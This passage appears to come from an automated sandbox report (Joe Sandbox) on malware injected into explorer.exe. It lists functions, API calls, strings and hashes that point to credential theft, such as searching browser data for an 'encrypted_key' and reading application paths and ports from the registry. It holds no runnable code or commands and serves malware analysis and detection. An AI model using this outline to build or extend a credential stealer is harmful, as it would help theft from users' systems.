                                                                                                                            control_flow_graph 786 43b1e5-43b20b 787 43b221-43b22a 786->787 788 43b20d-43b218 call 43aeea 786->788 790 43b240-43b243 787->790 791 43b22c-43b237 call 43ae65 787->791 796 43b3ea-43b3f0 788->796 797 43b21e 788->797 794 43b3b9-43b3d3 790->794 795 43b249-43b26b call 43a7ae 790->795 803 43b3b4-43b3b7 791->803 804 43b23d 791->804 798 43b3db-43b3df 794->798 808 43b296-43b29f 795->808 809 43b26d-43b278 795->809 797->787 801 43b3e1-43b3e3 798->801 802 43b3e8 798->802 801->802 807 43b3e5-43b3e7 801->807 802->796 803->794 806 43b3d5-43b3d8 803->806 804->790 806->798 807->802 810 43b2a1 808->810 811 43b2d6-43b2ea call 436a5a 808->811 812 43b27d-43b291 call 43a1c6 809->812 813 43b2a3-43b2a7 810->813 814 43b2a9-43b2ad 810->814 821 43b2f6-43b2fd 811->821 822 43b2ec-43b2f1 811->822 812->803 813->811 813->814 814->803 817 43b2b3-43b2b9 call 43a67c 814->817 824 43b2be-43b2c2 817->824 825 43b373 821->825 826 43b2ff-43b30e 821->826 822->803 824->811 828 43b2c4-43b2d4 824->828 827 43b377-43b37a 825->827 826->827 829 43b310-43b329 CreateFileMappingW 827->829 830 43b37c 827->830 828->812 831 43b32b-43b357 MapViewOfFile 829->831 832 43b37e-43b3ab call 43a1c6 829->832 830->803 831->832 833 43b359-43b370 831->833 832->803 837 43b3ad 832->837 833->825 837->803
                                                                                                                            APIs
                                                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0043B31D
                                                                                                                            • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0043B34F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CreateMappingView
                                                                                                                            • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                            • API String ID: 3452162329-3826999013
                                                                                                                            • Opcode ID: ec717a08e84435863a6d271e62e014d01d5b6bbef76d553b3785065585038ead
                                                                                                                            • Instruction ID: a0e467136780de40f2a8627eaab18dc84a20e703b189a6ae14bd09a80cbad918
                                                                                                                            • Opcode Fuzzy Hash: ec717a08e84435863a6d271e62e014d01d5b6bbef76d553b3785065585038ead
                                                                                                                            • Instruction Fuzzy Hash: FB51AD712007019FDB25CF18C845B2B77E6FB98314F10992FEA928B391DB78E815CB99
                                                                                                                            Function 00432E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • StrStrIW.KERNELBASE(?,?), ref: 00432E4B
                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00432EE4
                                                                                                                            • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00432F54
                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00432F62
                                                                                                                              • Part of subcall function 004319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A1E
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A3C
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A75
                                                                                                                              • Part of subcall function 004319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A98
                                                                                                                              • Part of subcall function 00431BC5: lstrlenW.KERNEL32(00000000,00000000,?,00432E75,PathToExe,00000000,00000000), ref: 00431BCC
                                                                                                                              • Part of subcall function 00431BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00432E75,PathToExe,00000000,00000000), ref: 00431BF0
                                                                                                                              • Part of subcall function 00431BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00432E75,PathToExe,00000000,00000000), ref: 00431C05
                                                                                                                              • Part of subcall function 00431BC5: lstrlenW.KERNEL32(00000000,?,00432E75,PathToExe,00000000,00000000), ref: 00431C1C
                                                                                                                              • Part of subcall function 00431AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00432E83,PathToExe,00000000,00000000), ref: 00431B16
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                            • String ID: PathToExe
                                                                                                                            • API String ID: 1799103994-1982016430
                                                                                                                            • Opcode ID: d608d5956f4985029cd672ee6a6a8a64bd6e50e5c64ce2fa66d8bcb30781278b
                                                                                                                            • Instruction ID: 2129266762c8c0cc6f028d735e58088ff0b719dae3c445dd3c930010b6e24de6
                                                                                                                            • Opcode Fuzzy Hash: d608d5956f4985029cd672ee6a6a8a64bd6e50e5c64ce2fa66d8bcb30781278b
                                                                                                                            • Instruction Fuzzy Hash: F43190716042116F8719AF22CC16D6F7AA9EFC8354F00552EF86987351DA78C901DBAA
                                                                                                                            Function 00434A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • wsprintfW.USER32 ref: 00434AA2
                                                                                                                            • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00434AC7
                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00434AD4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                            • String ID: %s\%08x$Software
                                                                                                                            • API String ID: 1800864259-1658101971
                                                                                                                            • Opcode ID: ace7b9dcff5b0795f623521590971dc8fa983b4b784196532be4db1011919f94
                                                                                                                            • Instruction ID: 2869166b569ad2205bbe38c6041ee9884972b216249653eaf0a3df5653071a5f
                                                                                                                            • Opcode Fuzzy Hash: ace7b9dcff5b0795f623521590971dc8fa983b4b784196532be4db1011919f94
                                                                                                                            • Instruction Fuzzy Hash: FA012F71600008BFDB08AF80DC8AEBF77ACEB49348F10007FF600A3110EAB06E809669
                                                                                                                            Function 00434317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _alloca_probe.NTDLL ref: 0043431C
                                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00434335
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00434363
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004343C8
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                              • Part of subcall function 0043418A: wsprintfW.USER32 ref: 00434212
                                                                                                                              • Part of subcall function 00431011: GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                              • Part of subcall function 00431011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004343B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 801677237-0
                                                                                                                            • Opcode ID: 080779346a19376a2b777ed0994af651509166e24e04109a0d26e02f177ca409
                                                                                                                            • Instruction ID: f43282f0029a6959182e388e0f6ea3e3545c232c9c74e1fa65d8b3a39a0ed68b
                                                                                                                            • Opcode Fuzzy Hash: 080779346a19376a2b777ed0994af651509166e24e04109a0d26e02f177ca409
                                                                                                                            • Instruction Fuzzy Hash: F11103B12042057FE715EB11DC45DBF77EDEB88348F00493EB949D2150EB78AD449B6A
                                                                                                                            Function 00499247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000497000.00000040.80000000.00040000.00000000.sdmp, Offset: 00497000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_497000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: df094dd86e25509f5de35ca07a1e407cc031daf0f4651a549572ba074fcb0573
                                                                                                                            • Instruction ID: a4683cc430775c54a3350699d263516dd21090b698549e5d054b9c8fb9ab8b61
                                                                                                                            • Opcode Fuzzy Hash: df094dd86e25509f5de35ca07a1e407cc031daf0f4651a549572ba074fcb0573
                                                                                                                            • Instruction Fuzzy Hash: 7BA13A725186525BDF228E7CCCC06A17F90EB56324B2D067EC9D18B3C2E7685C07C759
                                                                                                                            Function 004319E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A1E
                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A3C
                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A75
                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A98
                                                                                                                              • Part of subcall function 00431011: GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                              • Part of subcall function 00431011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 217796345-0
                                                                                                                            • Opcode ID: f1edc0a684e0e222f9cc3c4f37dd72ca392ed68e0ce09d08a8780c1f411ca93c
                                                                                                                            • Instruction ID: 1ccc4929eeaf5a582f9c977e6ccd55a0c10322cc5413a3b512cdd2f1f1d0ac3c
                                                                                                                            • Opcode Fuzzy Hash: f1edc0a684e0e222f9cc3c4f37dd72ca392ed68e0ce09d08a8780c1f411ca93c
                                                                                                                            • Instruction Fuzzy Hash: C821E772206345AFE7249B21CD04F3B77E8EFCD759F001A2EF58592260D628CD40872A
                                                                                                                            Function 00431EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00431ED5
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00431F0C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00431F98
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                            • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00431F82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1077800024-0
                                                                                                                            • Opcode ID: 750ee0c41b6b67ee7828045ad8b997b2da945e5bbbc5ee07ce2378917cc66559
                                                                                                                            • Instruction ID: 90d6705c5841a16fa1d43b808314c35bcf1acdc0e71b44c4216f316babd796f5
                                                                                                                            • Opcode Fuzzy Hash: 750ee0c41b6b67ee7828045ad8b997b2da945e5bbbc5ee07ce2378917cc66559
                                                                                                                            • Instruction Fuzzy Hash: 252151712083416FD705AB21DC45D2F7BEDEF8D358F00592EF49992260DB79C905DB26
                                                                                                                            Function 00431C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00433E1E,00000000,?,00433FA8), ref: 00431C46
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00433FA8), ref: 00431C56
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00433FA8), ref: 00431C91
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00433FA8), ref: 00431C76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2517252058-0
                                                                                                                            • Opcode ID: 06eb32add6240f0a793eed4b82eac5faa8fad9f7c27363e4d0b461628090d41c
                                                                                                                            • Instruction ID: f58f94a93fd8a76c8d961baa6f53adc1d70afcf191dd552b82e5a73b1bc66a7b
                                                                                                                            • Opcode Fuzzy Hash: 06eb32add6240f0a793eed4b82eac5faa8fad9f7c27363e4d0b461628090d41c
                                                                                                                            • Instruction Fuzzy Hash: 7DF0F4312002187BD2245F26DC88E7F7A5CDB4B7F9F12172EF915921A1DB1A5C01427C
                                                                                                                            Function 00432FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00433E30,00000000,00000000,?,00433FA8), ref: 00432FC1
                                                                                                                            • lstrlen.KERNEL32("encrypted_key":",?,00433FA8), ref: 00432FCE
                                                                                                                            • StrStrIA.SHLWAPI("encrypted_key":",0048692C,?,00433FA8), ref: 00432FDD
                                                                                                                              • Part of subcall function 0043190B: lstrlen.KERNEL32(?,?,?,?,00000000,00432783), ref: 0043192B
                                                                                                                              • Part of subcall function 0043190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00432783), ref: 00431930
                                                                                                                              • Part of subcall function 0043190B: lstrcat.KERNEL32(00000000,?), ref: 00431946
                                                                                                                              • Part of subcall function 0043190B: lstrcat.KERNEL32(00000000,00000000), ref: 0043194A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcat
                                                                                                                            • String ID: "encrypted_key":"
                                                                                                                            • API String ID: 493641738-877455259
                                                                                                                            • Opcode ID: f64e6089d9344851f781a634403936a5364875a002928447fcb8afbbcb4a608f
                                                                                                                            • Instruction ID: 248c4bf99aad6bc820a98a613c578d0b51f14fa19f4a594c7e4924ac255bef3a
                                                                                                                            • Opcode Fuzzy Hash: f64e6089d9344851f781a634403936a5364875a002928447fcb8afbbcb4a608f
                                                                                                                            • Instruction Fuzzy Hash: C4E09B72609A646F83A56BB91C5894F7F5CAE0A61570A047AF50197213DF998801D3AC
                                                                                                                            Function 0043BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0043BB40
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID: winDelete
                                                                                                                            • API String ID: 3188754299-3936022152
                                                                                                                            • Opcode ID: 9affb1942672b0aa136b5f2f39742b6e1948f02d29bd6170179affab7c79c8b0
                                                                                                                            • Instruction ID: 2b57f0a585499d123026b7ee8de308b40b580a2f8fddc38c12d08ef168d3248d
                                                                                                                            • Opcode Fuzzy Hash: 9affb1942672b0aa136b5f2f39742b6e1948f02d29bd6170179affab7c79c8b0
                                                                                                                            • Instruction Fuzzy Hash: 2211E531A00208EB8710AB658842A7EB775DF99760F10616BEA42D7794DF38AD0297DA
                                                                                                                            Function 00432EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431011: GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                              • Part of subcall function 00431011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00432EE4
                                                                                                                            • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00432F54
                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00432F62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1066184869-0
                                                                                                                            • Opcode ID: e8bc8986706d98e1410642239f6414fced19a6a6c2fabb99bc60ea76ecacb0d1
                                                                                                                            • Instruction ID: 3a389d19b97f46651b893b1ba779a083bed3ae6ab70b4b3decab3a45fb97eea5
                                                                                                                            • Opcode Fuzzy Hash: e8bc8986706d98e1410642239f6414fced19a6a6c2fabb99bc60ea76ecacb0d1
                                                                                                                            • Instruction Fuzzy Hash: 0001D635204250ABC719AF22DC05D6F7FB9EFCD358F00443EF81982160CA398845EBAA
                                                                                                                            Function 00434B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitInitializeProcessUninitialize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4175140541-0
                                                                                                                            • Opcode ID: 6a616c290e7709dc527bdbb42e6b90dea176575cf3692c0bbb8aa4a84ba368d2
                                                                                                                            • Instruction ID: cdcad3cdf69ff745295f11d1b6cef45371f2a4bf8c9d1fca54ea571b7c81e596
                                                                                                                            • Opcode Fuzzy Hash: 6a616c290e7709dc527bdbb42e6b90dea176575cf3692c0bbb8aa4a84ba368d2
                                                                                                                            • Instruction Fuzzy Hash: 32C09B303441004BE6C03FF15C0D74D3614EF44727F0158ADF20DC50A1DB5464009B3E
                                                                                                                            Function 00439FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00439FF8
                                                                                                                            Strings
                                                                                                                            • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0043A00E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHeap
                                                                                                                            • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                            • API String ID: 10892065-982776804
                                                                                                                            • Opcode ID: 831a35854963246e8725b4200501b28da5614a87eb6b3f7e817c9f79a1424388
                                                                                                                            • Instruction ID: b91165095fc7e8d730bd8fae112f3ce09205104953419c03fb2733ee45d4dd72
                                                                                                                            • Opcode Fuzzy Hash: 831a35854963246e8725b4200501b28da5614a87eb6b3f7e817c9f79a1424388
                                                                                                                            • Instruction Fuzzy Hash: F5F02B72648341BBE7301E54DC88F2767ACD79C789F20183BF986D2240E2B8AC01833D
                                                                                                                            Function 00431AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00432E83,PathToExe,00000000,00000000), ref: 00431B16
                                                                                                                              • Part of subcall function 00431011: GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                              • Part of subcall function 00431011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                              • Part of subcall function 004319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A1E
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A3C
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A75
                                                                                                                              • Part of subcall function 004319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A98
                                                                                                                            Strings
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00431B40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                            • API String ID: 2162223993-2036018995
                                                                                                                            • Opcode ID: 5fd5837eb178fd12c739eba98a902e93e94e63e485a28a47c4b1e42123986e93
                                                                                                                            • Instruction ID: bde18d6c00b61c63783d1dcb8ad73af420728683423087e064c2d80392746c95
                                                                                                                            • Opcode Fuzzy Hash: 5fd5837eb178fd12c739eba98a902e93e94e63e485a28a47c4b1e42123986e93
                                                                                                                            • Instruction Fuzzy Hash: B3F0242670064817D6112A2ACC80E3B765ECBCA3AAB03003FF41983221EE2B7C40827C
                                                                                                                            Function 0043A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0043A35F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePointer
                                                                                                                            • String ID: winSeekFile
                                                                                                                            • API String ID: 973152223-3168307952
                                                                                                                            • Opcode ID: 9e7868070d0d0efac637fa1195353d9a264a979019d57a990f5c0dfc1d614ed7
                                                                                                                            • Instruction ID: c28ba9198957e6ade5bc78ec97c0b506018acf4652cdaaba75a41c9fd50f8004
                                                                                                                            • Opcode Fuzzy Hash: 9e7868070d0d0efac637fa1195353d9a264a979019d57a990f5c0dfc1d614ed7
                                                                                                                            • Instruction Fuzzy Hash: 98F09030654204AF97119F64DC01AAB77AAEB49320F20866BFDA1C66D0DA34DD1096A6
                                                                                                                            Function 00439EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(04CB0000,00000000,?), ref: 00439EB5
                                                                                                                            Strings
                                                                                                                            • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00439ECD
                                                                                                                            Memory Dump Source
